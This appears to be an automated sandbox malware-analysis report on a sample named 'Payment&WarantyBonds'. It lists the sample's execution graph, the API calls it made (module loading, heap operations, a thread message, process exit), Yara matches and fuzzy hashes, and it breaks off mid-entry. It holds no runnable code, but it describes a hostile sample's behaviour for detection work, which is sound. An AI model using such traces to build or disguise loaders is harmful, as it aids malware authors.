                                                                                                                                                                                execution_graph 79555 42f5c3 79556 42f5d3 79555->79556 79557 42f5d9 79555->79557 79560 42e603 79557->79560 79559 42f5ff 79563 42c7b3 79560->79563 79562 42e61e 79562->79559 79564 42c7d0 79563->79564 79565 42c7e1 RtlAllocateHeap 79564->79565 79565->79562 79580 424853 79581 42486f 79580->79581 79582 424897 79581->79582 79583 4248ab 79581->79583 79584 42c483 NtClose 79582->79584 79585 42c483 NtClose 79583->79585 79586 4248a0 79584->79586 79587 4248b4 79585->79587 79590 42e643 RtlAllocateHeap 79587->79590 79589 4248bf 79590->79589 79591 42ba93 79592 42bab0 79591->79592 79595 1462df0 LdrInitializeThunk 79592->79595 79593 42bad8 79595->79593 79690 424bf3 79694 424c0c 79690->79694 79691 424c54 79692 42e523 RtlFreeHeap 79691->79692 79693 424c61 79692->79693 79694->79691 79695 424c94 79694->79695 79697 424c99 79694->79697 79696 42e523 RtlFreeHeap 79695->79696 79696->79697 79698 42f6f3 79699 42f663 79698->79699 79700 42e603 RtlAllocateHeap 79699->79700 79703 42f6c0 79699->79703 79701 42f69d 79700->79701 79702 42e523 RtlFreeHeap 79701->79702 79702->79703 79566 413983 79569 42c713 79566->79569 79570 42c72d 79569->79570 79573 1462c70 LdrInitializeThunk 79570->79573 79571 4139a5 79573->79571 79596 41b153 79597 41b197 79596->79597 79598 41b1b8 79597->79598 79599 42c483 NtClose 79597->79599 79599->79598 79704 413ef3 79705 413ef6 79704->79705 79710 417643 79705->79710 79707 413f2a 79708 413f76 79707->79708 79709 413f63 PostThreadMessageW 79707->79709 79709->79708 79711 417667 79710->79711 79712 4176a3 LdrLoadDll 79711->79712 79713 41766e 79711->79713 79712->79713 79713->79707 79689 1462b60 LdrInitializeThunk 79574 418c08 79577 42c483 79574->79577 79576 418c12 79578 42c4a0 79577->79578 79579 42c4b1 NtClose 79578->79579 79579->79576 79600 4019d9 79601 4019e0 79600->79601 79604 42fa93 79601->79604 79602 401abc 79602->79602 79607 42e0d3 79604->79607 79608 42e0f9 79607->79608 79619 407283 79608->79619 79610 42e10f 79618 42e16b 79610->79618 79622 41af63 79610->79622 79612 42e12e 79613 42e143 79612->79613 79637 42c853 79612->79637 79633 428163 79613->79633 79616 42e15d 79617 42c853 ExitProcess 79616->79617 79617->79618 79618->79602 79621 407290 79619->79621 79640 416363 79619->79640 79621->79610 79623 41af8f 79622->79623 79664 41ae53 79623->79664 79626 41afd4 79629 41aff0 79626->79629 79631 42c483 NtClose 79626->79631 79627 41afbc 79628 41afc7 79627->79628 79630 42c483 NtClose 79627->79630 79628->79612 79629->79612 79630->79628 79632 41afe6 79631->79632 79632->79612 79634 4281c5 79633->79634 79636 4281d2 79634->79636 79675 4184b3 79634->79675 79636->79616 79638 42c870 79637->79638 79639 42c881 ExitProcess 79638->79639 79639->79613 79641 416380 79640->79641 79643 416399 79641->79643 79644 42cee3 79641->79644 79643->79621 79646 42cefd 79644->79646 79645 42cf2c 79645->79643 79646->79645 79651 42bae3 79646->79651 79652 42bb00 79651->79652 79658 1462c0a 79652->79658 79653 42bb2c 79655 42e523 79653->79655 79661 42c803 79655->79661 79657 42cfa2 79657->79643 79659 1462c11 79658->79659 79660 1462c1f LdrInitializeThunk 79658->79660 79659->79653 79660->79653 79662 42c81d 79661->79662 79663 42c82e RtlFreeHeap 79662->79663 79663->79657 79665 41af49 79664->79665 79666 41ae6d 79664->79666 79665->79626 79665->79627 79670 42bb83 79666->79670 79669 42c483 NtClose 79669->79665 79671 42bb9d 79670->79671 79674 14635c0 LdrInitializeThunk 79671->79674 79672 41af3d 79672->79669 79674->79672 79677 4184dd 79675->79677 79676 4189eb 79676->79636 79677->79676 79683 413b63 79677->79683 79679 41860a 79679->79676 79680 42e523 RtlFreeHeap 79679->79680 79681 418622 79680->79681 79681->79676 79682 42c853 ExitProcess 79681->79682 79682->79676 79687 413b83 79683->79687 79685 413bec 79685->79679 79686 413be2 79686->79679 79687->79685 79688 41b273 RtlFreeHeap LdrInitializeThunk 79687->79688 79688->79686

                                                                                                                                                                                Executed Functions

                                                                                                                                                                                Function 00417643 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 176 417643-41766c call 42f103 179 417672-417680 call 42f703 176->179 180 41766e-417671 176->180 183 417690-4176a1 call 42dba3 179->183 184 417682-41768d call 42f9a3 179->184 189 4176a3-4176b7 LdrLoadDll 183->189 190 4176ba-4176bd 183->190 184->183 189->190
                                                                                                                                                                                APIs
                                                                                                                                                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004176B5
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2062501078.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Load
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2234796835-0
                                                                                                                                                                                • Opcode ID: 2acb059c442e8cdeca4d48adca3ecf7414906d67dbbe2b9188f97ec82255bcc6
                                                                                                                                                                                • Instruction ID: 87064ee05c68f4dd1de749d9eca8b4b2b264888e6efa99d8a4d6e083abd2e19a
                                                                                                                                                                                • Opcode Fuzzy Hash: 2acb059c442e8cdeca4d48adca3ecf7414906d67dbbe2b9188f97ec82255bcc6
                                                                                                                                                                                • Instruction Fuzzy Hash: B6015EB1E0420DABDB10EBE5DC42FDEB3789B54308F4041AAED0897241F635EB588B95
                                                                                                                                                                                Function 0042C483 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 201 42c483-42c4bf call 404653 call 42d6c3 NtClose
                                                                                                                                                                                APIs
                                                                                                                                                                                • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C4BA
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2062501078.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Close
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3535843008-0
                                                                                                                                                                                • Opcode ID: 92e54b4cd05bfc7cbc6d71ba954d9647256663cf06b5149f3237a1ae9698a208
                                                                                                                                                                                • Instruction ID: 5f458c6e9710c6fad3c7f30fce12baaa212b728e4b5dd2a8e1051120f2197376
                                                                                                                                                                                • Opcode Fuzzy Hash: 92e54b4cd05bfc7cbc6d71ba954d9647256663cf06b5149f3237a1ae9698a208
                                                                                                                                                                                • Instruction Fuzzy Hash: FEE04F366402147BC660AB5AEC01F9B775CDFC5754F40441AFA1C67241CA75790187A9
                                                                                                                                                                                Function 014635C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 218 14635c0-14635cc LdrInitializeThunk
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: 67bd818040d254c19299f56d314ca54b03b5123eb15fb2331032bee312583048
                                                                                                                                                                                • Instruction ID: 42431dc34975e4505897ffb0f278cf6122599ea87fc3b2db91252f76c4984271
                                                                                                                                                                                • Opcode Fuzzy Hash: 67bd818040d254c19299f56d314ca54b03b5123eb15fb2331032bee312583048
                                                                                                                                                                                • Instruction Fuzzy Hash: 4C90023160550502D10071584518746100597E0201F65C422A0424569DC7A58A5566A2
                                                                                                                                                                                Function 01462B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 215 1462b60-1462b6c LdrInitializeThunk
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: add815d2a5a7a64ad90e60a8563ee0ce6ad9d0bce20c52a84069633e08206745
                                                                                                                                                                                • Instruction ID: 15e6bfd57ade6d6efddfd964209354e4d5e1da77aa9a736fd7b3ff6562d2a033
                                                                                                                                                                                • Opcode Fuzzy Hash: add815d2a5a7a64ad90e60a8563ee0ce6ad9d0bce20c52a84069633e08206745
                                                                                                                                                                                • Instruction Fuzzy Hash: B490027120240103410571584418656400A97F0201B55C032E1014591DC63589956225
                                                                                                                                                                                Function 01462DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 217 1462df0-1462dfc LdrInitializeThunk
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: da0f6553456adf455130c60495fe9af2d98bd298f454b3c8d93f2cdc9daa8dcf
                                                                                                                                                                                • Instruction ID: c750160baa19f715617bd432b86c03dba9cae87245b9cbae0d6f6da60ecea77a
                                                                                                                                                                                • Opcode Fuzzy Hash: da0f6553456adf455130c60495fe9af2d98bd298f454b3c8d93f2cdc9daa8dcf
                                                                                                                                                                                • Instruction Fuzzy Hash: CC90023120140513D11171584508747000997E0241F95C423A0424559DD7668A56A221
                                                                                                                                                                                Function 01462C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 216 1462c70-1462c7c LdrInitializeThunk
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: f09be347fbdf522eb15a2869874e6af3d2dbe073f1c1f0a47515d74d8572f376
                                                                                                                                                                                • Instruction ID: d804c3e64f1c276b3b48b8df6143221833a54c226848d930eebd924a35dccc88
                                                                                                                                                                                • Opcode Fuzzy Hash: f09be347fbdf522eb15a2869874e6af3d2dbe073f1c1f0a47515d74d8572f376
                                                                                                                                                                                • Instruction Fuzzy Hash: F190023120148902D1107158840878A000597E0301F59C422A4424659DC7A589957221
                                                                                                                                                                                Function 00413EE7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65threadwindowCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                • PostThreadMessageW.USER32(4648H9mUM,00000111,00000000,00000000), ref: 00413F70
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2062501078.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MessagePostThread
                                                                                                                                                                                • String ID: 4648H9mUM$4648H9mUM
                                                                                                                                                                                • API String ID: 1836367815-3945090275
                                                                                                                                                                                • Opcode ID: fc863437f2a222eecc99e27a68920c10b8d12d91f8d3db2e4b01f62c0419dcbb
                                                                                                                                                                                • Instruction ID: bc975eb8726c69bafb209bc3abc5e2bb845464fdbd23420247ef6b23241c2fb3
                                                                                                                                                                                • Opcode Fuzzy Hash: fc863437f2a222eecc99e27a68920c10b8d12d91f8d3db2e4b01f62c0419dcbb
                                                                                                                                                                                • Instruction Fuzzy Hash: 8211E771E412587AEB10DA91CC02FDFBB789F81B14F10415AFA007B280D67857068795
                                                                                                                                                                                Function 00413EA5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62threadwindowCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 14 413ea5-413f03 16 413f0c-413f61 call 42efd3 call 417643 call 4045c3 call 424d13 14->16 17 413f07 call 42e5c3 14->17 26 413f83-413f88 16->26 27 413f63-413f74 PostThreadMessageW 16->27 17->16 27->26 28 413f76-413f80 27->28 28->26
                                                                                                                                                                                APIs
                                                                                                                                                                                • PostThreadMessageW.USER32(4648H9mUM,00000111,00000000,00000000), ref: 00413F70
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2062501078.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MessagePostThread
                                                                                                                                                                                • String ID: 4648H9mUM$4648H9mUM
                                                                                                                                                                                • API String ID: 1836367815-3945090275
                                                                                                                                                                                • Opcode ID: af4ebe8acc006ffe43571c7bda9ccbed571883a4accc997bb5bfd0f9ce61daf3
                                                                                                                                                                                • Instruction ID: 351767833ddedfa17d599af5ce28c90b69b4e73ae4ca805aaa10b4a4daff1e13
                                                                                                                                                                                • Opcode Fuzzy Hash: af4ebe8acc006ffe43571c7bda9ccbed571883a4accc997bb5bfd0f9ce61daf3
                                                                                                                                                                                • Instruction Fuzzy Hash: 3011E771E44258BBDB219AA18C02FDFBB788F41714F14415AFA047B280D7B8970687EA
                                                                                                                                                                                Function 00413EF3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57threadwindowCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 29 413ef3-413f03 31 413f0c-413f61 call 42efd3 call 417643 call 4045c3 call 424d13 29->31 32 413f07 call 42e5c3 29->32 41 413f83-413f88 31->41 42 413f63-413f74 PostThreadMessageW 31->42 32->31 42->41 43 413f76-413f80 42->43 43->41
                                                                                                                                                                                APIs
                                                                                                                                                                                • PostThreadMessageW.USER32(4648H9mUM,00000111,00000000,00000000), ref: 00413F70
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2062501078.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MessagePostThread
                                                                                                                                                                                • String ID: 4648H9mUM$4648H9mUM
                                                                                                                                                                                • API String ID: 1836367815-3945090275
                                                                                                                                                                                • Opcode ID: 24872ade7dce1fd0697dc9a9e5a2d2560ba7c9996ae1e9089a1c1d970fb4794b
                                                                                                                                                                                • Instruction ID: af8418bac4e5e62b63a11df15cf6155001274432c4d1df8b90f4fa99ff691cbc
                                                                                                                                                                                • Opcode Fuzzy Hash: 24872ade7dce1fd0697dc9a9e5a2d2560ba7c9996ae1e9089a1c1d970fb4794b
                                                                                                                                                                                • Instruction Fuzzy Hash: E401D671E4025876EB219A91CC02FDFBB7C8F41B14F04805AFA047B2C0E6BC570687EA
                                                                                                                                                                                Function 0042C803 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 196 42c803-42c844 call 404653 call 42d6c3 RtlFreeHeap
                                                                                                                                                                                APIs
                                                                                                                                                                                • RtlFreeHeap.NTDLL(00000000,00000004,00000000,5057E845,00000007,00000000,00000004,00000000,00416F27,000000F4), ref: 0042C83F
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2062501078.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FreeHeap
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3298025750-0
                                                                                                                                                                                • Opcode ID: c715db85d53a13bf2703d1e84f2e01fd539ab5599b816f7cf02fb243ce824c2a
                                                                                                                                                                                • Instruction ID: 1f1b2a02fd313679521514eb47efc6442fe8b54bb3e9c2829bcf38eb00dc1064
                                                                                                                                                                                • Opcode Fuzzy Hash: c715db85d53a13bf2703d1e84f2e01fd539ab5599b816f7cf02fb243ce824c2a
                                                                                                                                                                                • Instruction Fuzzy Hash: 4AE065B66002047BC614EE59EC42EDB73ADEFCA714F00441AFA18A7241DA75B9108BB9
                                                                                                                                                                                Function 0042C7B3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 191 42c7b3-42c7f7 call 404653 call 42d6c3 RtlAllocateHeap
                                                                                                                                                                                APIs
                                                                                                                                                                                • RtlAllocateHeap.NTDLL(?,0041E40B,?,?,00000000,?,0041E40B,?,?,?), ref: 0042C7F2
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2062501078.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                                • Opcode ID: 28b77bc20edb0a168c07d26e1778ebc3a076a00a9a0fa9a8c42f3da64252722e
                                                                                                                                                                                • Instruction ID: fae582eca77becafcc92349202efceb97f256e514cb84dd1cbd0d04417ea3fd8
                                                                                                                                                                                • Opcode Fuzzy Hash: 28b77bc20edb0a168c07d26e1778ebc3a076a00a9a0fa9a8c42f3da64252722e
                                                                                                                                                                                • Instruction Fuzzy Hash: 6CE06D722002147FD610EF99EC41E9B33ACEFCA710F00441AFA08A7241DA74B9108BB9
                                                                                                                                                                                Function 0042C853 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 206 42c853-42c88f call 404653 call 42d6c3 ExitProcess
                                                                                                                                                                                APIs
                                                                                                                                                                                • ExitProcess.KERNEL32(?,00000000,00000000,?,B5727CFB,?,?,B5727CFB), ref: 0042C88A
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2062501078.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ExitProcess
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 621844428-0
                                                                                                                                                                                • Opcode ID: 64d2dd0f805d5c374ef794ce1e7e794fe0ea545bc6e9901331b0f9e010597a2a
                                                                                                                                                                                • Instruction ID: bc802583a2c2c609f8f687f00da689e9d4c98de31bfd4ded7f3633e7ceebd465
                                                                                                                                                                                • Opcode Fuzzy Hash: 64d2dd0f805d5c374ef794ce1e7e794fe0ea545bc6e9901331b0f9e010597a2a
                                                                                                                                                                                • Instruction Fuzzy Hash: 11E04F316002147BD110BB6ADC05FDB776CDFC6714F00441AFE5867242CA75790087B5
                                                                                                                                                                                Function 01462C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 211 1462c0a-1462c0f 212 1462c11-1462c18 211->212 213 1462c1f-1462c26 LdrInitializeThunk 211->213
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: f6f74bcd47975b36e83420b2ea5e622f9a13712478cd2502d361d0fde4ba2153
                                                                                                                                                                                • Instruction ID: 1652681ba7f666d9345951e9e80a9fa7bcf55f6ad23245ccebe64a66eb6d4bd1
                                                                                                                                                                                • Opcode Fuzzy Hash: f6f74bcd47975b36e83420b2ea5e622f9a13712478cd2502d361d0fde4ba2153
                                                                                                                                                                                • Instruction Fuzzy Hash: 62B09B719015C5D9DA11F764460CB17790477D0705F15C073D3030653F4778C1D5E276

                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                Function 014A2349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                • API String ID: 0-2160512332
                                                                                                                                                                                • Opcode ID: cd26dd6bc3e9509f823b6d19694b27e405d7f331e83a29fc3f35ffdb26f689d7
                                                                                                                                                                                • Instruction ID: dd9530ebf40027f84f1df2b409238e44b1b0245f33776a6a8d7d4067ec8241cf
                                                                                                                                                                                • Opcode Fuzzy Hash: cd26dd6bc3e9509f823b6d19694b27e405d7f331e83a29fc3f35ffdb26f689d7
                                                                                                                                                                                • Instruction Fuzzy Hash: 6292C071604342AFE721CF19C840F6BBBE8BBA4754F45482EFA94D7260D7B0E845DB92
                                                                                                                                                                                Function 014D12ED Relevance: 11.8, Strings: 9, Instructions: 515COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                                                                                                                                                • API String ID: 0-3591852110
                                                                                                                                                                                • Opcode ID: cb53a3481275990e0c00cd1a80536b11806610d2b638d40263f2b4f5052cc796
                                                                                                                                                                                • Instruction ID: 1cef109768ef9241459805e24169a14a0de596a1bb8dd9d0cbd1a6e14704dda7
                                                                                                                                                                                • Opcode Fuzzy Hash: cb53a3481275990e0c00cd1a80536b11806610d2b638d40263f2b4f5052cc796
                                                                                                                                                                                • Instruction Fuzzy Hash: D712BF34600642DFEB25CF29C465BB6BBF1FF19A14F18845EE9868B762D734E881CB50
                                                                                                                                                                                Function 0141D34C Relevance: 11.6, Strings: 9, Instructions: 312COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                                                                                                                                                • API String ID: 0-3532704233
                                                                                                                                                                                • Opcode ID: 91d791eca970a07a604e8db94ed69394cf39e18f9b046e92b738a600fa51c52d
                                                                                                                                                                                • Instruction ID: 43e3830feba3c0d4f1af5f3c00c4c9da42b5790bfd5f603e841ebd6372f89ea7
                                                                                                                                                                                • Opcode Fuzzy Hash: 91d791eca970a07a604e8db94ed69394cf39e18f9b046e92b738a600fa51c52d
                                                                                                                                                                                • Instruction Fuzzy Hash: D9B1ADB29083129FD711CF69C444A6FBBE8AB98754F05092FF988D7324D730D909CB92
                                                                                                                                                                                Function 014B9179 Relevance: 10.4, Strings: 8, Instructions: 401COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
